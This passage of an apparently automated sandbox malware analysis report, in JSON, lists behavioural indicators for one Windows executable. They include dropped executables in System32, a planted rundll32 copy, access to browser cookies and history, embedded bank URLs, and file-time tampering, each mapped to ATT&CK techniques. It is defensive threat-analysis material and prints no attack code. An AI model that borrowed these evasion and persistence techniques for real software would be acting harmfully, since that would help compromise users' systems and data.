"https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-23", "type": 2, "relevance": 2, "name": "Detected known bank URL artifact", "description": "\"www.credit-agricole.fr\" (Source: 00000000-00005204.00000001.334759.002D0000.00000004.mdmp, Indicator: \"credit-agricole.fr\")\n \"capitalone.com\" (Source: 00000000-00005204.00000001.334759.002D0000.00000004.mdmp, Indicator: \"capitalone.com\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\" was detected as \"Microsoft visual C++ 5.0\"\n \"_.exe\" was detected as \"Microsoft visual C++ 5.0\"\n \"notepad_.exe\" was detected as \"Microsoft visual C++ 5.0\"\n \"RUNDLL32.EXE.67A47BFB.bin\" was detected as \"Microsoft visual C++ 5.0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to access non-existent file \"C:\\MFC42.DLL\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to access non-existent file \"C:\\ODBC32.dll\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\MFC42LOC.DLL\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\MFC42LOC.DLL.DLL\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to access non-existent file \"C:\\Windows\\IEXPLORE.EXE\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to access non-existent file \"C:\\Windows\\IEXPLORE .EXE\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to access non-existent file \"C:\\Windows\\internat.exe\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to access non-existent file \"C:\\Windows\\rundll32.exe\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\IEXPLORE.EXE\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\IEXPLORE .EXE\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mssysint.exe\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mspsint.exe\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mspbint.exe\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mspbbase.dll\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\mspbhook.dll\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\psinthk.dll\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\psintbs.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" reads file \"c:\\5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to touch file \"C:\\MFC42.DLL\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to touch file \"C:\\Windows\\system32\\MFC42.DLL\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to touch file \"C:\\ODBC32.dll\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to touch file \"C:\\Windows\\system32\\ODBC32.dll\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to touch file \"C:\\version.DLL\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to touch file \"C:\\Windows\\system32\\odbcint.dll\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to touch file \"C:\\Windows\\system32\\MFC42LOC.DLL\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to touch file \"C:\\Windows\\system32\\MFC42LOC.DLL.DLL\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" trying to touch file \"C:\\Windows\\IEXPLORE.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"rundll32.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" writes file \"c:\\windows\\system32\\¢«.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" touched file \"C:\\Windows\\System32\\¢«.exe\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" touched file \"C:\\Windows\\System32\\notepad¢¬.exe\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" touched file \"C:\\Windows\\system\"\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" touched file \"C:\\Windows\\system\\rundll32.exe\"\n \"rundll32.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rundll32.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\"\n \"rundll32.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\"\n \"rundll32.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\History\"\n \"rundll32.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"rundll32.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\"\n \"rundll32.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Cookies\"\n \"rundll32.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\History\"\n \"rundll32.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" queries basic process information of the \"C:\\Windows\\system\\rundll32.exe\" (UID: 892)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" connecting to \"\\ThemeApiPort\"\n \"rundll32.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"rundll32.exe\" trying to access non-existent file \"C:\\Windows\\system\\WINSPOOL.DRV\"\n \"rundll32.exe\" trying to access non-existent file \"\\Device\\RasAcd\"\n \"rundll32.exe\" trying to access non-existent file \"C:\\Windows\\system\\RUNDLL32.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"5D2803AE4DE571F4CF7B41BB40F141D650E591A384245E007D60E4B10EDDF74D\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"DISABLE\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\MSIPV\"; Key: \"MAINVER\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"_.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"notepad_.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"RUNDLL32.EXE.67A47BFB.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"rundll32.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\system\\rundll32.exe]- [targetUID: 00000000-00005204]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Contains ability to retrieve the time elapsed since the system was started (API string)\n Matched sigs: Able to identify virtual environment by using user activity (API string)\n Matched sigs: Contains ability to delay execution by waiting for signal/timeout (API string)\n Matched sigs: Contains ability to delay the execution of current thread", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00000892.00000000.334478.0040B000.00000040.mdmp\")\n Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005204.00000001.334759.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-304", "type": 2, "relevance": 1, "name": "Contains ability to modify registry key/value (API string)", "description": "Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-409", "type": 2, "relevance": 1, "name": "Contains ability to set file time (API string)", "description": "Found reference to API \"SetFileTime\" (Indicator: \"SetFileTime\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found reference to API \"SetFileTime\" (Indicator: \"SetFileTime\"; Source: \"00000000-00005204.00000000.334618.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-338", "type": 2, "relevance": 1, "name": "Contains ability to perform Base64 encoding/decoding", "description": "Found string \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\" (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n Found string \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\" (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"; File: \"5d2803ae4de571f4cf7b41bb40f141d650e591a384245e007d60e4b10eddf74d\")\n file/memory contains long string with (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\"; File: \"_.exe\")\n file/memory contains long string with (Indicator: \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"; File: \"_.exe\")\n Found string 